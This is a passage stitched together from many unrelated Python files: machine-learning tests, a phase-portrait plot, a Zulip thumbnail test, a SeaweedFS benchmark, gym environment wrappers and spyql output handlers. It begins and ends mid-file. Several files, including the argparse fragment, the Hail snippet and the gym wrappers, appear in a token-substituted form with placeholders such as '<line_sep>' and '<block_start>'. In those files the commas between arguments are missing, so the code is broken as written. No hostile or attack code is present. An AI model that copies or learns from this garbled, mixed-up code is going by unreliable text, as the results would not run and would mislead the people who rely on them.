help='Eval factors' action='store_true' default=<false>)<line_sep>parser.add_argument('-m' '--metadata' dest="with_metadata" help='Use metadata' action='store_true' default=<false>)<line_sep>parser.add_argument('-om' '--only_metadata' dest="only_metadata" help='Use only metadata' action='store_true' default=<false>)<line_sep>parser.add_argument('-ms' '--metadata_source' dest="metadata_source" 
type=str help='Suffix of metadata files' default="rovi")<line_sep>args=parser.parse_args()<line_sep>params=models.params_1<if_stmt>args.params_file<block_start>params=json.load(open(args.params_file))<block_end>process(params)<block_end>
<class_stmt>InsufficientFundsError(Exception)<block_start><pass><block_end>
<import_stmt>unittest<import_from_stmt>kafka_influxdb.encoder heapster_json_encoder<class_stmt>TestHeapsterJsonEncoder(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.encoder=heapster_json_encoder.Encoder()<block_end><def_stmt>testEncoder self<block_start>msg=b'{ "MetricsName":"memory/major_page_faults","MetricsValue":{"value":56}, "MetricsTimestamp":"2017-01-19T17:26:00Z", "MetricsTags":{"container_name":"docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d"} } '<line_sep>encoded_message=self.encoder.encode(msg)<line_sep>expected_msg=['memory/major_page_faults,container_name=docker/9be430d3a1a28601292aebd76e15512d5471c630a7fa164d6a2a2fd9cbc19e3d value=56 1484846760']<line_sep>self.assertEqual(encoded_message expected_msg)<block_end><block_end>
<import_stmt>hail<as>hl<line_sep>ht=hl.utils.range_table(1_000_000 n_partitions=10_000)<line_sep># use HDFS so as not to create garbage on GS ht.write('/tmp/many_partitions.ht')<line_sep>mt=hl.utils.range_matrix_table(1_000_000 2 n_partitions=10_000)<line_sep>mt.write('/tmp/many_partitions.mt')<line_sep>
"""Tests for elfi result objects (Sample, BolfiSample) and multivariate output."""
import numpy as np
import pytest

import elfi


def test_sample():
    """A Sample exposes its draws, metadata, and any extra keyword attributes."""
    n_samples = 10
    parameter_names = ['a', 'b']
    distance_name = 'dist'
    samples = [np.random.random(n_samples),
               np.random.random(n_samples),
               np.random.random(n_samples)]
    outputs = dict(zip(parameter_names + [distance_name], samples))
    sample = elfi.methods.results.Sample(
        method_name="TestRes",
        outputs=outputs,
        parameter_names=parameter_names,
        discrepancy_name=distance_name,
        something='x',
        something_else='y',
        n_sim=0,
    )

    assert sample.method_name == "TestRes"
    assert hasattr(sample, 'samples')
    assert sample.n_samples == n_samples
    assert sample.dim == len(parameter_names)
    assert not sample.is_multivariate

    # Columns of samples_array line up with parameter order; the last
    # stored output is the discrepancy.
    assert np.allclose(samples[0], sample.samples_array[:, 0])
    assert np.allclose(samples[1], sample.samples_array[:, 1])
    assert np.allclose(samples[-1], sample.discrepancies)

    # Extra keyword arguments become attributes on the result object.
    assert hasattr(sample, 'something')
    assert sample.something_else == 'y'
    with pytest.raises(AttributeError):
        sample.not_here

    # Test summary
    sample.summary()


def test_bolfi_sample():
    """BolfiSample merges per-chain draws, discarding warmup iterations."""
    n_chains = 3
    n_iters = 10
    warmup = 5
    parameter_names = ['a', 'b']
    chains = np.random.random((n_chains, n_iters, len(parameter_names)))
    result = elfi.methods.results.BolfiSample(
        method_name="TestRes",
        chains=chains,
        parameter_names=parameter_names,
        warmup=warmup,
        something='x',
        something_else='y',
        n_sim=0,
    )

    assert result.method_name == "TestRes"
    assert hasattr(result, 'samples')
    assert hasattr(result, 'chains')
    assert hasattr(result, 'outputs')
    assert result.n_samples == n_chains * (n_iters - warmup)
    assert result.dim == len(parameter_names)
    assert not result.is_multivariate

    # verify that chains are merged correctly
    s0 = np.concatenate([chains[i, warmup:, 0] for i in range(n_chains)])
    s1 = np.concatenate([chains[i, warmup:, 1] for i in range(n_chains)])
    assert np.allclose(s0, result.samples[parameter_names[0]])
    assert np.allclose(s1, result.samples[parameter_names[1]])

    assert hasattr(result, 'something')
    assert result.something_else == 'y'


@pytest.mark.parametrize('multivariate_model', [3], indirect=True)
def test_multivariate(multivariate_model):
    """Rejection sampling on a multivariate model yields (n, dim)-shaped outputs."""
    n_samples = 10
    rej = elfi.Rejection(multivariate_model['d'], batch_size=5)
    sample = rej.sample(n_samples)
    assert sample.outputs['t1'].shape == (n_samples, 3)
    assert sample.outputs['d'].shape == (n_samples,)
    assert sample.is_multivariate
# Program 03a: Phase portrait of a linear system.
# See Figure 3.8(a).
#
# Integrates trajectories of the planar linear system
#     x' = a*x + b*y,   y' = c*x + d*y
# forward and backward in time from a grid of initial conditions,
# then overlays the vector field.
import matplotlib.pyplot as plt
import numpy as np
from scipy.integrate import odeint
import pylab as pl

# Coefficients of the 2-dimensional linear system.
a, b, c, d = 2, 1, 1, 2


def dx_dt(x, t):
    """Right-hand side of the linear ODE system (t is unused but required by odeint)."""
    return [a * x[0] + b * x[1], c * x[0] + d * x[1]]


# Trajectories in forward time, then backward time, from a 5x5 grid of ICs.
initial_conditions = np.linspace(-1, 1, 5)
for time_grid in (np.linspace(0, 4, 100), np.linspace(0, -4, 100)):
    for r in initial_conditions:
        for s in initial_conditions:
            trajectory = odeint(dx_dt, [r, s], time_grid)
            plt.plot(trajectory[:, 0], trajectory[:, 1], 'r-')

# Label the axes and set fontsizes.
plt.xlabel('x', fontsize=15)
plt.ylabel('y', fontsize=15)
plt.tick_params(labelsize=15)
plt.xlim(-1, 1)
plt.ylim(-1, 1)

# Plot the vector field of the same system.
X, Y = np.mgrid[-1:1:10j, -1:1:10j]
u = a * X + b * Y
v = c * X + d * Y
pl.quiver(X, Y, u, v, color='b')
plt.show()
from io import StringIO

import orjson

from zerver.lib.test_classes import ZulipTestCase


class ThumbnailTest(ZulipTestCase):
    def test_thumbnail_redirect(self) -> None:
        """/thumbnail redirects to the stored upload (or camo URL) and enforces access."""
        self.login("hamlet")
        fp = StringIO("zulip!")
        fp.name = "zulip.jpeg"

        result = self.client_post("/json/user_uploads", {"file": fp})
        self.assert_json_success(result)
        json = orjson.loads(result.content)
        self.assertIn("uri", json)
        uri = json["uri"]
        base = "/user_uploads/"
        self.assertEqual(base, uri[: len(base)])

        # The uploader is redirected straight to the upload URI.
        result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"})
        self.assertEqual(result.status_code, 302, result)
        self.assertEqual(uri, result.url)

        # A different user may not view this upload.
        self.login("iago")
        result = self.client_get("/thumbnail", {"url": uri[1:], "size": "full"})
        self.assertEqual(result.status_code, 403, result)
        self.assert_in_response("You are not authorized to view this file.", result)

        # External https URLs are proxied through the external-content CDN.
        uri = "https://www.google.com/images/srpr/logo4w.png"
        result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
        self.assertEqual(result.status_code, 302, result)
        base = "https://external-content.zulipcdn.net/external_content/56c362a24201593891955ff526b3b412c0f9fcd2/68747470733a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
        self.assertEqual(base, result.url)

        # Same for plain http URLs.
        uri = "http://www.google.com/images/srpr/logo4w.png"
        result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
        self.assertEqual(result.status_code, 302, result)
        base = "https://external-content.zulipcdn.net/external_content/7b6552b60c635e41e8f6daeb36d88afc4eabde79/687474703a2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
        self.assertEqual(base, result.url)

        # And for scheme-relative URLs.
        uri = "//www.google.com/images/srpr/logo4w.png"
        result = self.client_get("/thumbnail", {"url": uri, "size": "full"})
        self.assertEqual(result.status_code, 302, result)
        base = "https://external-content.zulipcdn.net/external_content/676530cf4b101d56f56cc4a37c6ef4d4fd9b0c03/2f2f7777772e676f6f676c652e636f6d2f696d616765732f737270722f6c6f676f34772e706e67"
        self.assertEqual(base, result.url)
"""Tests for QuantityModel and the air/vacuum wavelength conversion utilities."""
import pickle

import pytest
import numpy as np

from astropy import units as u
from astropy import modeling

from specutils.utils import QuantityModel

from ..utils.wcs_utils import refraction_index, vac_to_air, air_to_vac

wavelengths = [300, 500, 1000] * u.nm
# Expected (n - 1) * 1e4 for each refraction-index method at the wavelengths above.
data_index_refraction = {
    'Griesen2006': np.array([3.07393068, 2.9434858, 2.8925797]),
    'Edlen1953': np.array([2.91557413, 2.78963801, 2.74148172]),
    'Edlen1966': np.array([2.91554272, 2.7895973, 2.74156098]),
    'PeckReeder1972': np.array([2.91554211, 2.78960005, 2.74152561]),
    'Morton2000': np.array([2.91568573, 2.78973402, 2.74169531]),
    'Ciddor1996': np.array([2.91568633, 2.78973811, 2.74166131]),
}


def test_quantity_model():
    c = modeling.models.Chebyshev1D(3)
    uc = QuantityModel(c, u.AA, u.km)
    assert uc(10 * u.nm).to(u.m) == 0 * u.m


def test_pickle_quantity_model(tmp_path):
    """
    Check that a QuantityModel can roundtrip through pickling, as
    it would if fit in a multiprocessing pool.
    """
    c = modeling.models.Chebyshev1D(3)
    uc = QuantityModel(c, u.AA, u.km)

    pkl_file = tmp_path / "qmodel.pkl"
    with open(pkl_file, "wb") as f:
        pickle.dump(uc, f)
    with open(pkl_file, "rb") as f:
        new_model = pickle.load(f)

    assert new_model.input_units == uc.input_units
    assert new_model.return_units == uc.return_units
    assert type(new_model.unitless_model) == type(uc.unitless_model)
    assert np.all(new_model.unitless_model.parameters == uc.unitless_model.parameters)


@pytest.mark.parametrize("method", data_index_refraction.keys())
def test_refraction_index(method):
    tmp = (refraction_index(wavelengths, method) - 1) * 1e4
    assert np.isclose(tmp, data_index_refraction[method], atol=1e-7).all()


@pytest.mark.parametrize("method", data_index_refraction.keys())
def test_air_to_vac(method):
    tmp = refraction_index(wavelengths, method)
    # Inversion scheme matches n * lambda_air directly.
    assert np.isclose(wavelengths.value * tmp,
                      air_to_vac(wavelengths, method=method, scheme='inversion').value,
                      rtol=1e-6).all()
    # vac -> air -> vac roundtrip via iteration recovers the input.
    assert np.isclose(wavelengths.value,
                      air_to_vac(vac_to_air(wavelengths, method=method),
                                 method=method, scheme='iteration').value,
                      atol=1e-12).all()
"""Async read/write latency benchmark against a local seaweedfs volume server.

Usage: python bench.py <num_volume> <concurrency>
"""
import aiohttp
import asyncio
import os
import sys
import time
import random
import contextlib

seaweedfs_url = 'http://127.0.0.1:9081'


def random_content():
    """Return 1-10 KiB of random bytes to upload."""
    return os.urandom(random.randint(1, 10) * 1024)


def random_fid(volumes):
    """Build a random seaweedfs file id of the form "<volume>,<key><cookie>"."""
    volume_id = random.choice(volumes)
    file_key = random.randint(0, 1 << 24)
    file_key_hex = '%x' % file_key
    cookie_hex = '00000000'
    return f'{volume_id},{file_key_hex}{cookie_hex}'


class Reporter:
    """Collects per-request latencies (milliseconds) and prints summaries."""

    def __init__(self):
        self.items = []

    @contextlib.contextmanager
    def report(self):
        """Context manager that records the wall-clock time of the enclosed call."""
        t0 = time.monotonic()
        yield
        value = time.monotonic() - t0
        self.items.append(value * 1000)

    def summary(self, concurrency):
        """Print avg, percentiles and estimated qps for collected samples, then reset."""
        n = len(self.items)
        s = sum(self.items)
        avg = s / n if n > 0 else 0
        s_items = list(sorted(self.items))
        result = [f'avg={avg:.1f}']
        p_s = [0.5, 0.8, 0.9, 0.95, 0.99]
        if n > 0:
            for p in p_s:
                v = s_items[int(n * p)]
                result.append('p{}={:.1f}'.format(int(p * 100), v))
        # BUGFIX: previously `1000 / avg` raised ZeroDivisionError when no
        # samples had been collected (avg == 0); report 0 qps instead.
        qps = (1000 / avg) * concurrency if avg > 0 else 0
        result.append(f'qps={qps:.0f}')
        print(' '.join(result))
        self.items = []


READER_REPORTER = Reporter()
WRITER_REPORTER = Reporter()


async def put(session, fid: str, content: bytes):
    """Upload *content* under *fid*; return (status, body)."""
    url = f'{seaweedfs_url}/{fid}'
    data = aiohttp.FormData()
    data.add_field('file', content, content_type='application/gzip')
    async with session.put(url, data=data) as response:
        result = await response.read()
        return response.status, result


async def get(session, fid: str):
    """Download *fid*; return (status, body)."""
    url = f'{seaweedfs_url}/{fid}'
    async with session.get(url) as response:
        result = await response.read()
        return response.status, result


async def reader_task(session, fid_s, n):
    """Read every fid once, in random order, timing each request."""
    fid_s = list(fid_s)
    random.shuffle(fid_s)
    for fid in fid_s:
        with READER_REPORTER.report():
            status, r = await get(session, fid)
            assert status == 200, (status, r)


async def writer_task(session, fid_s, n):
    """Write random content to every fid once, in random order, timing each request."""
    fid_s = list(fid_s)
    random.shuffle(fid_s)
    for fid in fid_s:
        content = random_content()
        with WRITER_REPORTER.report():
            status, r = await put(session, fid, content)
            assert status in (200, 201, 204), (status, r)


async def benchmark(session, num_volume, num_fid, num_round, concurrency):
    """Run `num_round` rounds of concurrent writes followed by concurrent reads."""
    volumes = list(range(20, 20 + num_volume))
    # Each concurrent task gets its own slice of fids.
    fid_s_s = []
    for i in range(concurrency):
        fid_s = [random_fid(volumes) for _ in range(num_fid // concurrency)]
        fid_s_s.append(fid_s)
    loop = asyncio.get_event_loop()
    for n in range(num_round):
        print(f'{n} ' + '-' * 60)
        writer_tasks = []
        for i in range(concurrency):
            t = writer_task(session, fid_s_s[i], num_round)
            writer_tasks.append(loop.create_task(t))
        await asyncio.gather(*writer_tasks)
        WRITER_REPORTER.summary(concurrency)
        reader_tasks = []
        for i in range(concurrency):
            t = reader_task(session, fid_s_s[i], num_round)
            reader_tasks.append(loop.create_task(t))
        await asyncio.gather(*reader_tasks)
        READER_REPORTER.summary(concurrency)


async def async_main(num_volume, concurrency):
    print(f'num_volume={num_volume} concurrency={concurrency}')
    async with aiohttp.ClientSession() as session:
        await benchmark(
            session,
            num_fid=1000,
            num_round=3,
            num_volume=num_volume,
            concurrency=concurrency,
        )


def main():
    num_volume = int(sys.argv[1])
    concurrency = int(sys.argv[2])
    loop = asyncio.get_event_loop()
    loop.run_until_complete(async_main(num_volume, concurrency))


if __name__ == "__main__":
    main()
from enum import Enum
from typing import Dict, Any

from jwt.algorithms import get_default_algorithms
from cryptography.hazmat._types import (
    _PRIVATE_KEY_TYPES,
    _PUBLIC_KEY_TYPES,
)

# custom types
# NOTE(review): cryptography.hazmat._types is a private module and these
# aliases may break on a cryptography upgrade -- confirm before bumping.
PrivateKey = _PRIVATE_KEY_TYPES
PublicKey = _PUBLIC_KEY_TYPES
JWTClaims = Dict[str, Any]


class EncryptionKeyFormat(str, Enum):
    """
    represent the supported formats for storing encryption keys.

    - PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail)
    - SSH (RFC4716) or short format (RFC4253, section-6.6, explained here:
      https://coolaj86.com/articles/the-ssh-public-key-format/)
    - DER (https://en.wikipedia.org/wiki/X.690#DER_encoding)
    """
    pem = 'pem'
    ssh = 'ssh'
    der = 'der'


# dynamic enum because pyjwt does not define one
# see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values
JWTAlgorithm = Enum('JWTAlgorithm', [(k, k) for k in get_default_algorithms().keys()])
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0


class BigchainDBError(Exception):
    """Base class for BigchainDB exceptions."""


class CriticalDoubleSpend(BigchainDBError):
    """Data integrity error that requires attention"""
"""Quick demo: score sentence-pair similarity with ClinicalBERT."""
from semantic_text_similarity.models import ClinicalBertSimilarity
from scipy.stats import pearsonr  # noqa: F401 -- kept from original, unused here

model = ClinicalBertSimilarity()
predictions = model.predict([
    ("The patient is sick.", "Grass is green."),
    ("A prescription of acetaminophen 325 mg was given.",
     " The patient was given Tylenol."),
])
print(predictions)
"""
Demo of saving/restoring training state with torch.save / torch.load.

NOTE: this snippet only illustrates the function signatures and is not
runnable on its own (``iter_num``, ``optimizer``, ``model`` and
``save_path`` are assumed to exist in the surrounding context).
"""
import torch  # BUGFIX: torch was used but never imported

save_info = {  # information to checkpoint
    "iter_num": iter_num,                 # iteration count
    "optimizer": optimizer.state_dict(),  # optimizer state dict
    "model": model.state_dict(),          # model state dict
}
# Save the checkpoint.
torch.save(save_info, save_path)

# Load the checkpoint back.
save_info = torch.load(save_path)
optimizer.load_state_dict(save_info["optimizer"])
# BUGFIX: was `sae_info["model"]` -- an undefined name (typo for save_info).
model.load_state_dict(save_info["model"])
# Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Environment wrappers."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>gym<import_stmt>numpy<as>np<import_from_stmt>PIL Image<import_from_stmt>world_models.utils nested<class_stmt>ObservationDict(gym.Wrapper)<block_start>"""Changes the observation space to be a dict."""<def_stmt>__init__ self env key='observ'<block_start>self._key=key<line_sep>self.env=env<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end>@property<def_stmt>observation_space self<block_start>spaces={self._key:self.env.observation_space}<line_sep><return>gym.spaces.Dict(spaces)<block_end>@property<def_stmt>action_space self<block_start><return>self.env.action_space<block_end><def_stmt>step self action<block_start>obs,reward,done,info=self.env.step(action)<line_sep>obs={self._key:np.array(obs)}<line_sep><return>obs reward done info<block_end><def_stmt>reset self<block_start>obs=self.env.reset()<line_sep>obs={self._key:np.array(obs)}<line_sep><return>obs<block_end><block_end><class_stmt>ActionRepeat(gym.Wrapper)<block_start>"""Repeats the same action `n` times and returns the last step results."""<def_stmt>__init__ self env n<block_start>super(ActionRepeat self).__init__(env)<assert_stmt>n<ge>1<line_sep>self._n=n<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env 
name)<block_end><def_stmt>step self action<block_start>done=<false><line_sep>total_reward=0<line_sep>current_step=0<while_stmt>current_step<l>self._n<and><not>done<block_start>observ,reward,done,info=self.env.step(action)<line_sep>total_reward<augadd>reward<line_sep>current_step<augadd>1<block_end><return>observ total_reward done info<block_end><block_end><class_stmt>ActionNormalize(gym.Env)<block_start>"""Normalizes the action space."""<def_stmt>__init__ self env<block_start>self._env=env<line_sep>self._mask=np.logical_and(np.isfinite(env.action_space.low) np.isfinite(env.action_space.high))<line_sep>self._low=np.where(self._mask env.action_space.low -1)<line_sep>self._high=np.where(self._mask env.action_space.high 1)<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self._env name)<block_end>@property<def_stmt>action_space self<block_start>low=np.where(self._mask -np.ones_like(self._low) self._low)<line_sep>high=np.where(self._mask np.ones_like(self._low) self._high)<line_sep><return>gym.spaces.Box(low high dtype=np.float32)<block_end><def_stmt>step self action<block_start>original=(action+1)/2<times>(self._high-self._low)+self._low<line_sep>original=np.where(self._mask original action)<line_sep><return>self._env.step(original)<block_end><def_stmt>reset self<block_start><return>self._env.reset()<block_end><def_stmt>render self mode='human'<block_start><return>self._env.render(mode=mode)<block_end><block_end><class_stmt>MaximumDuration(gym.Wrapper)<block_start>"""Force sets `done` after the specified duration."""<def_stmt>__init__ self env duration<block_start>super(MaximumDuration self).__init__(env)<line_sep>self._duration=duration<line_sep>self._step=<none><block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start><if_stmt>self._step<is><none><block_start><raise>RuntimeError('Must reset 
environment.')<block_end>observ,reward,done,info=self.env.step(action)<line_sep>self._step<augadd>1<if_stmt>self._step<ge>self._duration<block_start>done=<true><line_sep>self._step=<none><block_end><return>observ reward done info<block_end><def_stmt>reset self<block_start>self._step=0<line_sep><return>self.env.reset()<block_end><block_end><class_stmt>MinimumDuration(gym.Wrapper)<block_start>"""Force resets `done` before the specified duration."""<def_stmt>__init__ self env duration<block_start>super(MinimumDuration self).__init__(env)<line_sep>self._duration=duration<line_sep>self._step=<none><block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start>observ,reward,done,info=self.env.step(action)<line_sep>self._step<augadd>1<if_stmt>self._step<l>self._duration<block_start>done=<false><block_end><return>observ reward done info<block_end><def_stmt>reset self<block_start>self._step=0<line_sep><return>self.env.reset()<block_end><block_end><class_stmt>ConvertTo32Bit(gym.Wrapper)<block_start>"""Converts observation and rewards to int/float32."""<def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end><def_stmt>step self action<block_start>observ,reward,done,info=self.env.step(action)<line_sep>observ=nested.map(self._convert_observ observ)<line_sep>reward=self._convert_reward(reward)<line_sep><return>observ reward done info<block_end><def_stmt>reset self<block_start>observ=self.env.reset()<line_sep>observ=nested.map(self._convert_observ observ)<line_sep><return>observ<block_end><def_stmt>_convert_observ self observ<block_start><if_stmt><not>np.isfinite(observ).all()<block_start><raise>ValueError('Infinite observation encountered.')<block_end><if_stmt>observ.dtype<eq>np.float64<block_start><return>observ.astype(np.float32)<block_end><if_stmt>observ.dtype<eq>np.int64<block_start><return>observ.astype(np.int32)<block_end><return>observ<block_end><def_stmt>_convert_reward 
self reward<block_start><if_stmt><not>np.isfinite(reward).all()<block_start><raise>ValueError('Infinite reward encountered.')<block_end><return>np.array(reward dtype=np.float32)<block_end><block_end><class_stmt>RenderObservation(gym.Env)<block_start>"""Changes the observation space to rendered frames."""<def_stmt>__init__ self env size=(64 64) dtype=np.uint8 key='image'<block_start><assert_stmt>isinstance(env.observation_space gym.spaces.Dict)<line_sep>self.env=env<line_sep>self._size=size<line_sep>self._dtype=dtype<line_sep>self._key=key<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self.env name)<block_end>@property<def_stmt>observation_space self<block_start>high={np.uint8:255 np.float:1.0}[self._dtype]<line_sep>image=gym.spaces.Box(0 high self._size+(3 ) dtype=self._dtype)<line_sep>spaces=self.env.observation_space.spaces.copy()<assert_stmt>self._key<not><in>spaces<line_sep>spaces[self._key]=image<line_sep><return>gym.spaces.Dict(spaces)<block_end>@property<def_stmt>action_space self<block_start><return>self.env.action_space<block_end><def_stmt>step self action<block_start>obs,reward,done,info=self.env.step(action)<line_sep>obs[self._key]=self._render_image()<line_sep><return>obs reward done info<block_end><def_stmt>reset self<block_start>obs=self.env.reset()<line_sep>obs[self._key]=self._render_image()<line_sep><return>obs<block_end><def_stmt>_render_image self<block_start>"""Renders the environment and processes the image."""<line_sep>image=self.env.render('rgb_array')<if_stmt>image.shape[:2]<ne>self._size<block_start>image=np.array(Image.fromarray(image).resize(self._size))<block_end><if_stmt>self._dtype<and>image.dtype<ne>self._dtype<block_start><if_stmt>image.dtype<in>(np.float32 np.float64)<and>self._dtype<eq>np.uint8<block_start>image=(image<times>255).astype(self._dtype)<block_end><elif_stmt>image.dtype<eq>np.uint8<and>self._dtype<in>(np.float32 
np.float64)<block_start>image=image.astype(self._dtype)/255<block_end><else_stmt><block_start>message='Cannot convert observations from {} to {}.'<line_sep><raise>NotImplementedError(message.format(image.dtype self._dtype))<block_end><block_end><return>image<block_end><block_end><class_stmt>DeepMindEnv(gym.Env)<block_start>"""Wrapper for deepmind MuJoCo environments to expose gym env methods."""<line_sep>metadata={'render.modes':['rgb_array']}<line_sep>reward_range=(-np.inf np.inf)<def_stmt>__init__ self env render_size=(64 64) camera_id=0<block_start>self._env=env<line_sep>self._render_size=render_size<line_sep>self._camera_id=camera_id<block_end><def_stmt>__getattr__ self name<block_start><return>getattr(self._env name)<block_end>@property<def_stmt>observation_space self<block_start>components={}<for_stmt>key,value self._env.observation_spec().items()<block_start>components[key]=gym.spaces.Box(-np.inf np.inf value.shape dtype=np.float32)<block_end><return>gym.spaces.Dict(components)<block_end>@property<def_stmt>action_space self<block_start>action_spec=self._env.action_spec()<line_sep><return>gym.spaces.Box(action_spec.minimum action_spec.maximum dtype=np.float32)<block_end><def_stmt>step self action<block_start>time_step=self._env.step(action)<line_sep>obs=dict(time_step.observation)<line_sep>reward=time_step.reward<or>0<line_sep>done=time_step.last()<line_sep>info={'discount':time_step.discount}<line_sep><return>obs reward done info<block_end><def_stmt>reset self<block_start>time_step=self._env.reset()<line_sep><return>dict(time_step.observation)<block_end><def_stmt>render self *args **kwargs<block_start><if_stmt>kwargs.get('mode' 'rgb_array')<ne>'rgb_array'<block_start><raise>ValueError("Only render mode 'rgb_array' is supported.")<block_end><del_stmt>args# Unused <del_stmt>kwargs# Unused <return>self._env.physics.render(*self._render_size camera_id=self._camera_id)<block_end><def_stmt>get_state self<block_start><return>(np.array(self.physics.data.qpos) 
np.array(self.physics.data.qvel) np.array(self.physics.data.ctrl) np.array(self.physics.data.act))<block_end><def_stmt>set_state self state<block_start><with_stmt>self.physics.reset_context()<block_start>self.physics.data.qpos[:]=state[0]<line_sep>self.physics.data.qvel[:]=state[1]<line_sep>self.physics.data.ctrl[:]=state[2]<line_sep>self.physics.data.act[:]=state[3]<block_end><block_end><block_end>
<import_from_stmt>pytorch_pfn_extras.distributed._dataset_util create_distributed_subset_indices# NOQA
# coding: utf8
from __future__ import unicode_literals

from .lightnet import Network, Image, BoxLabels
from .about import __version__


def load(name, path=None):
    """Load a pre-trained network by *name*, optionally from *path*."""
    return Network.load(name, path=path)
from spyql.nulltype import Null


class OutputHandler:
    """Mediates data processing with data writing"""

    @staticmethod
    def make_handler(prs):
        """
        Chooses the right handler depending on the kind of query and
        eventual optimization opportunities
        """
        if prs["group by"] and not prs["partials"]:
            return GroupByDelayedOutSortAtEnd(
                prs["order by"], prs["limit"], prs["offset"])
        if prs["order by"]:
            # TODO optimization: use special handler that only keeps the top n
            # elements in memory when LIMIT is defined
            if prs["distinct"]:
                return DistinctDelayedOutSortAtEnd(
                    prs["order by"], prs["limit"], prs["offset"])
            return DelayedOutSortAtEnd(
                prs["order by"], prs["limit"], prs["offset"])
        if prs["distinct"]:
            return LineInDistinctLineOut(prs["limit"], prs["offset"])
        return LineInLineOut(prs["limit"], prs["offset"])

    def __init__(self, limit, offset):
        self.limit = limit
        self.rows_written = 0
        self.offset = offset if offset else 0

    def set_writer(self, writer):
        self.writer = writer

    def handle_result(self, result, group_key, sort_keys):
        """
        To be implemented by child classes to handle a new output row
        (aka result). All inputs should be tuples.
        """
        return self.is_done()

    def is_done(self):
        # premature ending
        return self.limit is not None and self.rows_written >= self.limit

    def write(self, row):
        # Skip rows while the OFFSET is not exhausted, then emit.
        if self.offset > 0:
            self.offset -= 1
        else:
            self.writer.writerow(row)
            self.rows_written += 1

    def finish(self):
        self.writer.flush()


class LineInLineOut(OutputHandler):
    """Simple handler that immediately writes every processed row"""

    def handle_result(self, result, *_):
        self.write(result)
        return self.is_done()

    def finish(self):
        super().finish()


class LineInDistinctLineOut(OutputHandler):
    """In-memory distinct handler that immediately writes every non-duplicated row"""

    def __init__(self, limit, offset):
        super().__init__(limit, offset)
        self.output_rows = set()

    def handle_result(self, result, *_):
        # uses a set to detect duplicates instead of storing all rows
        if result in self.output_rows:
            return False  # duplicate
        self.output_rows.add(result)
        self.write(result)
        return self.is_done()

    def finish(self):
        super().finish()


class DelayedOutSortAtEnd(OutputHandler):
    """
    Only writes after collecting and sorting all data.
    Temporary implementation that reads every processed row into memory.
    """

    def __init__(self, orderby, limit, offset):
        super().__init__(limit, offset)
        self.orderby = orderby
        self.output_rows = []

    def handle_result(self, result, sort_keys, *_):
        self.output_rows.append({"data": result, "sort_keys": sort_keys})
        # TODO use temporary files to write `output_rows` whenever it gets too large
        # TODO sort intermediate results before writing to a temporary file
        return False  # no premature endings here

    def finish(self):
        # TODO read and merge previously sorted temporary files (look into heapq.merge)
        # 1. sorts everything
        if self.orderby:
            # Taking advantage of list.sort being stable: sort by each
            # criterion from minor to major (not the most efficient way,
            # but straightforward).
            for idx in reversed(range(len(self.orderby))):
                criterion = self.orderby[idx]
                self.output_rows.sort(
                    key=lambda row: (
                        # handle NULLs based on NULLS FIRST/LAST specification
                        (row["sort_keys"][idx] is Null) != criterion["rev_nulls"],
                        row["sort_keys"][idx],
                    ),
                    reverse=criterion["rev"],  # handles ASC/DESC order
                )
        # 2. writes sorted rows to output
        for row in self.output_rows:
            # it would be more efficient to slice `output_rows` based on
            # limit/offset; however, this is more generic with less repeated
            # logic and this is a temporary implementation
            if self.is_done():
                break
            self.write(row["data"])
        super().finish()


class GroupByDelayedOutSortAtEnd(DelayedOutSortAtEnd):
    """
    Extends `DelayedOutSortAtEnd` to only store intermediate group by results
    instead of keeping all rows in memory
    """

    def __init__(self, orderby, limit, offset):
        super().__init__(orderby, limit, offset)
        self.output_rows = dict()

    def handle_result(self, result, sort_keys, group_key):
        # uses a dict to store intermediate group by results instead of
        # storing all rows
        self.output_rows[group_key] = {"data": result, "sort_keys": sort_keys}
        return False  # no premature endings here

    def finish(self):
        # converts output_rows dict to list so that it can be sorted and written
        self.output_rows = list(self.output_rows.values())
        super().finish()


class DistinctDelayedOutSortAtEnd(DelayedOutSortAtEnd):
    """
    Alters `DelayedOutSortAtEnd` to only store distinct results instead of
    keeping all rows in memory
    """

    def __init__(self, orderby, limit, offset):
        super().__init__(orderby, limit, offset)
        self.output_rows = dict()

    def handle_result(self, result, sort_keys, *_):
        # uses a dict to store distinct results instead of storing all rows
        if result not in self.output_rows:
            self.output_rows[result] = sort_keys
        return False  # no premature endings here

    def finish(self):
        # converts output_rows dict to list so that it can be sorted and written
        self.output_rows = [
            {"data": k, "sort_keys": v} for k, v in self.output_rows.items()
        ]
        super().finish()
# IMPORTATION STANDARD

# IMPORTATION THIRDPARTY
import pytest

# IMPORTATION INTERNAL
from gamestonk_terminal.stocks.quantitative_analysis import factors_view


@pytest.fixture(scope="module")
def vcr_config():
    """Scrub the User-Agent header and pin the CAPM date range in recorded cassettes."""
    return {
        "filter_headers": [("User-Agent", None)],
        "filter_query_parameters": [
            ("period1", "1598220000"),
            ("period2", "1635980400"),
        ],
    }


@pytest.mark.vcr
@pytest.mark.record_stdout
